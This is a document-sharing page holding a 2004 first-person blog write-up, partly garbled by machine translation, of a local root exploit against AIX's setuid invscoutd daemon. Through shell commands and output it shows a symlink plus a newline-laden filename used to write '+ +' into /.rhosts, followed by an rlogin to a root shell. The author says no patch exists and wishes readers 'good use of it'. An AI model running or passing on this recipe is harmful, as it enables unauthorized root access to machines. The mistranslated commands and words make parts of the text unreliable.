aix捉蟲記之__invscoutd(aix捉蟲記之 _ _ invscoutd)_第1頁
aix捉蟲記之__invscoutd(aix捉蟲記之 _ _ invscoutd)_第2頁
aix捉蟲記之__invscoutd(aix捉蟲記之 _ _ invscoutd)_第3頁
aix捉蟲記之__invscoutd(aix捉蟲記之 _ _ invscoutd)_第4頁
aix捉蟲記之__invscoutd(aix捉蟲記之 _ _ invscoutd)_第5頁
已閱讀5頁,還剩18頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

1、aix捉蟲記之_invscoutdaix捉蟲記之 _ _ invscoutdThe _invscoutd AIX bugCreation time: 2004-06-04 update time: 2004-06-04Article properties: OriginalArticle submission: watercloud (watercloud_at_)AIX can catch insectsInvscoutdThis article is a short note of AIX security (in fact, screen copy),Tidy up,

2、 add some notes, share with interested friends:)the article relates to a loophole I found on AIX4.x & 5L, which allows ordinary users to get root privileges, and now IBM seems to have no patch, so I hope you'll make good use of it.Time: 2003-5-3 daysThe weather is sunny, cloudless sky with l

3、ittle white cloudsToday, in a good mood, the first two days to catch AIX's security BUG, very fruitful, stack overflow, heap overflow, format string, PATH cheat, execute the commandI'll continue today.Platform information:-bash-2.05b$oslevel-bash-2.05b$oslevel -r5100-01Check the invsc

4、outd command by typing-bash-2.05b$LS -l /usr/sbin/invscoutd-r-sr-xr-x 1, root, system, 217868, Aug, 032001, /usr/sbin/invscoutd|Were examining the reason? Need? Who told him to take this s?!First, let's know which way the command is mixed up-bash-2.05b$man invscoutd.The, invscoutd, command, impl

5、ements, a, permanent, Inventory, Scout, server, daemon, onOne, machine, in, a, user's, network., The, local, usual, client, is, a, Java, applet, runningIn, the, user's, Web, browser, which, was, downloaded, from, a, central, Inventory, ScoutCGI application.After watching the nap, ing.Look at

6、 the look of this command:-bash-2.05b$invscoutdInvscoutd:, Missing, log, file, name.Inventory Scout Daemon 2.0.2. CAT VERSION USAGE: invscoutd options logfile also said to write the log file.Logfile Append status and err msgs. write to stderr. - means-o Overwrite preexisting log file instead of appe

7、nd. to overwrite the existing file can also be said to-pN Change port number to N from default 808. to the default listener on port 808-bN, Change, read, buffer, size, to, N, from, default,-dN, Change, Max, logic, DB, file, size, to, N, from, default,.-tN, Change, timeout, period, to, N, seconds, fr

8、om, default, seconds.-vN Change verbosity level to N from default 18, to support the interaction level, the higher the level of information should be more detailed25=max, 20=debug, 18=calls, 15=banner, 10=errs, 5=fatal, 0=none.Vaguely remember, there are many loopholes in the previous Unix, and the

9、log file permissions are not handled correctly,Let's check his log file first !-bash-2.05b$LS -l /tmp/bbLs:, 0653-341, The, file, /tmp/bb, does, not, exist.-bash-2.05b$invscoutd /tmp/bbInventory Scout Version 邏輯數(shù)據(jù)庫版本開始invscoutd 2.0.2:p = 808 u = 0 v = 18 T = 30 D = 50000 PID = 1702

10、8鞭打= /甲氧芐啶/ BB- bash-2.05b $ ls - L /甲氧芐啶/ BB- rw-R -R - 1根員工270 03 03:54 /tmp / BB哇噻,權(quán)限果然有問題!日志文件是根所有的說!睡意全無,立刻就清醒了!有點(diǎn)不敢相信自己的眼睛,漏洞有這么好找嗎?!趕緊敲個(gè)ID確認(rèn)一下,不會是自己本來就是根登陸的- bash-2.05b $iduid = 203云GID = 1員工看來沒錯(cuò),是個(gè)漏洞,那我能利用這個(gè)漏洞做什么呢?想想.至少可以把系統(tǒng)重要配置文件破壞掉吧,哈哈.再想想對于不存在的重要文件如/ .rhosts文件其實(shí)暫時(shí)也就想到這么一個(gè)文件,我們可以用這個(gè)漏洞創(chuàng)立這個(gè)文

11、件,要是之前執(zhí)行一次umask 000創(chuàng)立的文件我們就有修改權(quán)限了 _ 這樣我們就可以任意改寫文件內(nèi)容了,如rhosts中加一行:/。+ +可惜R系列效勞使用rhosts時(shí)會對文件屬性進(jìn)行檢查:如果文件不屬于對應(yīng)用戶,或文件權(quán)限除所有者外其他用戶或同組用戶有寫權(quán)限均驗(yàn)證失?。】磥硗ㄟ^創(chuàng)立一個(gè)我們可寫的/ .rhosts文件來獲得根權(quán)限是行不通了我們覆蓋重要文件如/etc/passwd,并不能改變文件權(quán)限回頭再一琢磨,我們不就是要想控制寫入文件的內(nèi)容嗎?不能通過直接獲得文件寫權(quán)限自由寫內(nèi)容,那就間接點(diǎn),要是日志文件寫入內(nèi)容我們可以控制那不也能通過修改/ .rhosts,/etc/passwd,/

12、var/spool/cron / crontabs /根等文件把自己變?yōu)楦藛??趕緊來看看日志文件里寫了什么內(nèi)容:- bash-2.05b貓美元/ tmp / BB2003 / 05 / 03 03:54:37 g16716:invscoutd_2.0.2庫存童版2003 / 05 / 03 03:54:37 g16716:invscoutd_2.0.2邏輯數(shù)據(jù)庫版本2003 / 05 / 03 03:54:37 p17028:invscoutd_2.0.2開始invscoutd 2.0.2:p = 808 u = 0 v = 18 T = 30 D = 50000

13、 PID = 17028鞭打= /甲氧芐啶/ BB里面好似就鞭打= /甲氧芐啶/ BB和輸入有關(guān)。再試試,看這個(gè)問題能不能重現(xiàn)。- bash-2.05b invscoutd美元/ AA。庫存童版邏輯數(shù)據(jù)庫版本退出代碼2,PID 536968056??磥磉€得先殺掉老的進(jìn)程才能再試。- bash-2.05b PS EF | grep投資美元云15526 1 0 04:36:25 PTS / 0 0:00 invscoutd / AA。云16068 16836 1 04:37:50 PTS / 0 0:00 grep的洞察- bash-2.05b殺- 9 15526美元看

14、看剛剛出錯(cuò)記錄到日志文件了沒?- bash-2.05b $ ls -l / AA。LS:0653-341文件。/ AA不存在。沒有的說。我再試試,我非要重現(xiàn)一次才放心。- bash-2.05b invscoutd美元/ AA。庫存童版邏輯數(shù)據(jù)庫版本開始invscoutd 2.0.2:p = 808 u = 0 v = 18 T = 30 D = 50000 PID = 15526鞭打=。/ AA- bash-2.05b $ ls -l / AA。LS:0653-341文件。/ AA不存在。咦,為什么沒有記進(jìn)來?難道文件名還必須以/打頭?,先不管了,就寫到/tmp下吧

15、,再試試。這次學(xué)乖了,先殺掉進(jìn)程。- bash-2.05b PS EF | grep invsc美元云14194 15338 3 03:55:29 PTS / 0 0:00 grep invsc云17028 1 0 03:54:37 PTS / 0 0:00 invscoutd / AA。- bash-2.05b殺- 9 17028美元.經(jīng)測試,果然能重現(xiàn),放心了想了想,要通過改寫.rhosts,passwd,crotable突破系統(tǒng)權(quán)限取得根特權(quán),都必須要能完整的控制一行寫入文件的內(nèi)容,日志中能控制的是:輸入文件名鞭打=局部,那面文件名中帶換行符就可以控制一行的內(nèi)容了,如:AAAA n完整的

16、一行 naaaa這種形似的文件名。想了就做。但命令行上一時(shí)想不起來如何輸入n字符并把它作為命令行的一個(gè)參數(shù),剛好以前學(xué)的Perl派上了用場 _ *用Perl來執(zhí)行一個(gè)系統(tǒng)命令invscoutd/甲氧芐啶/ bbbbb n + + nddd,看看能不能產(chǎn)生一個(gè)單獨(dú)的一行記錄內(nèi)容+ +- bash-2.05b $ Perl e系統(tǒng)invscoutd,/甲氧芐啶/ bbbbb n + + nddd“;庫存童版邏輯數(shù)據(jù)庫版本開始invscoutd 2.0.2:p = 808 u = 0 v = 18 T = 30 D = 50000 PID = 16282鞭打= /甲氧芐啶

17、/ bbbbb+ +DDD- bash-2.05b美元貓/甲氧芐啶/ bbbbb *2003 / 05 / 03 03:59:09 g14204:invscoutd_2.0.2庫存童版2003 / 05 / 03 03:59:09 g14204:invscoutd_2.0.2邏輯數(shù)據(jù)庫版本2003 / 05 / 03 03:59:09 g14204:invscoutd_2.0.2綁定錯(cuò)誤,端口808:插座的名稱已被使用。2003 / 05 / 03 03:59:09 g14204:invscoutd_2.0.2退出代碼2,PID 536968072。2003 / 0

18、5 / 03 03:59:27 g14934:invscoutd_2.0.2庫存童版2003 / 05 / 03 03:59:27 g14934:invscoutd_2.0.2邏輯數(shù)據(jù)庫版本2003 / 05 / 03 03:59:27 p16282:invscoutd_2.0.2開始invscoutd 2.0.2:p = 808 u = 0 v = 18 T = 30 D = 50000 PID = 16282鞭打= /甲氧芐啶/ bbbbb+ +DDD嘿嘿,可以的說!- bash-2.05b $ ls - L /甲氧芐啶/ bbbbb *- rw-R -R -

19、1根員工602 03 03:59 /甲氧芐啶/ bbbbb+ +DDD那我們?nèi)绾螌憽皀 + n內(nèi)容到/ .rhosts呢?想想.再想想.呵呵,我想到了,你想到了嗎?再給你5分鐘,好好想想如果直接執(zhí)行rhosts invscoutd /。肯定不行,里面不會有我們期望的+ +行。如果我們執(zhí)行Perl e系統(tǒng)invscoutd,/甲氧芐啶/ bbbbb n + + nddd“;向日志文件寫入+ +成功,但寫入的文件是/甲氧芐啶/ bbbbb n + + nddd,而我們現(xiàn)在期望是寫到rhosts文件/,再想想.歸納一下,問題核心是想把一文件名寫入B文件中,UNIX下的符號鏈接好似就是這個(gè)橋梁耶我們建

20、立一個(gè)- > B的符號連接不就行了!LN然后Invscoutd AIt should be.Begin action:-bash-2.05b$LS -l /.rhostsLs:, 0653-341, The, file, /.rhosts, does, not, exist.A symbolic link A - > B:-bash-2.05b$Perl, -e'symlink, "/.rhosts", "/tmp/ccn+ +ndd""B" here is "/.rhosts""&q

21、uot;A" is "/tmp/ccn+ +ndd""-bash-2.05b$LS -l /tmp/cc*Lrwxrwxrwx 1, cloud, staff, 8, May, 03, 04:02, /tmp/cc+ +DD - > /.rhostsCome, execute-bash-2.05b$, Perl, -e,'system, invscoutd, /tmp/ccn+, +ndd;Inventory Scout Version Logic Database Version Exit code 2, PI

22、D 536968072.-bash-2.05b$, PS, -ef, |grep, invscCloud 1628210 03:59:27 - 0:00 invscoutd /tmp/bbbbb + + + DDDCloud 04:03:40, pts/0, 0:00, grep, invsc-bash-2.05b$kill -9 16282-bash-2.05b$, Perl, -e,'system, invscoutd, /tmp/ccn+, +ndd;Inventory Scout Version Logic Database Versio

23、n Start invscoutd 2.0.2:P=808, u=0, v=18, t=30, d=50000, pid=17150Flog=/tmp/cc+ +DDSee if the file is generated:-bash-2.05b$LS -l /.rhosts-rw-r-r- 1, root, staff, 598, May, 03, 04:03, /.rhostsOK, let's go on with the content:-bash-2.05b$cat /.rhosts2003/05/03, 04:03:33, G17144:invscoutd_2

24、.0.2, Inventory, Scout, Version, 2003/05/03, 04:03:33, G17144:invscoutd_2.0.2, Logic, Database, Version, 2003/05/03, 04:03:33, G17144:invscoutd_2.0.2, Bind, error, port, 808:, The, socket, name, is, already, in, use.2003/05/03, 04:03:33, G17144:invscoutd_2.0.2, Exit, code 2, PID 536968

25、072.2003/05/03, 04:03:48, G14270:invscoutd_2.0.2, Inventory, Scout, Version, 2003/05/03, 04:03:48, G14270:invscoutd_2.0.2, Logic, Database, Version, 2003/05/03, 04:03:48, P17150:invscoutd_2.0.2, Start, invscoutd, 2.0.2:P=808, u=0, v=18, t=30, d=50000, pid=17150Flog=/tmp/cc+ +DDHa ha +

26、+ written into it!Come on, use the root user rlogin localhost login system, so you can get root permissions:-bash-2.05b$, rlogin, -l, root, localhostUsage:, rlogin, host -ex -l, username, -f|-F, -k, realm -8Faint! As soon as I'm happy, I forgot the command format:Come again:-bash-2.05b$, rlogin,

27、 localhost, -l, root* * * Welcome, to, AIX, Version, 5.1 *!* * *請參閱相關(guān)的信息在/usr/lpp/bos自述文件* AIX操作系統(tǒng)的這個(gè)版本。* * *.- bash-2.05b # <好爽的特權(quán)#提示附耶!- bash-2.05b # IDuid = 0根GID = 0系統(tǒng)組= 2bin,3系統(tǒng)、7平安、8玉米、10審核、11LP哈哈哈搞定啦偶麻雀變根啦學(xué)了這么多年的UNIX知識終于沒白學(xué)呀熱淚盈框ING .繼續(xù)感動ING .!%¥%,還在陶醉 !該干活啦好啦好啦自戀狂!簡單清理戰(zhàn)場- bash-2.05b # RM /

28、 .rhosts- bash-2.05b # RM /甲氧芐啶/ BB * /甲氧芐啶/ CC *- bash-2.05b # PS EF | grep invsc云14306 15338 1 04:05:51 PTS / 0 0:00 grep invsc云17150 1 0 04:03:48 0:00 invscoutd /tmp / CC嗎?+ +?DD- bash-2.05b #殺9 17150- bash-2.05b #還看呀已經(jīng)拉下帷幕了,都是后臺操作了?! _ =后記=這個(gè)漏洞在aix4。X上也存在,去年一個(gè)羅馬IBM的工程師給我講高版本的invscoutd系統(tǒng)沒有這個(gè)平安bug了,但

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論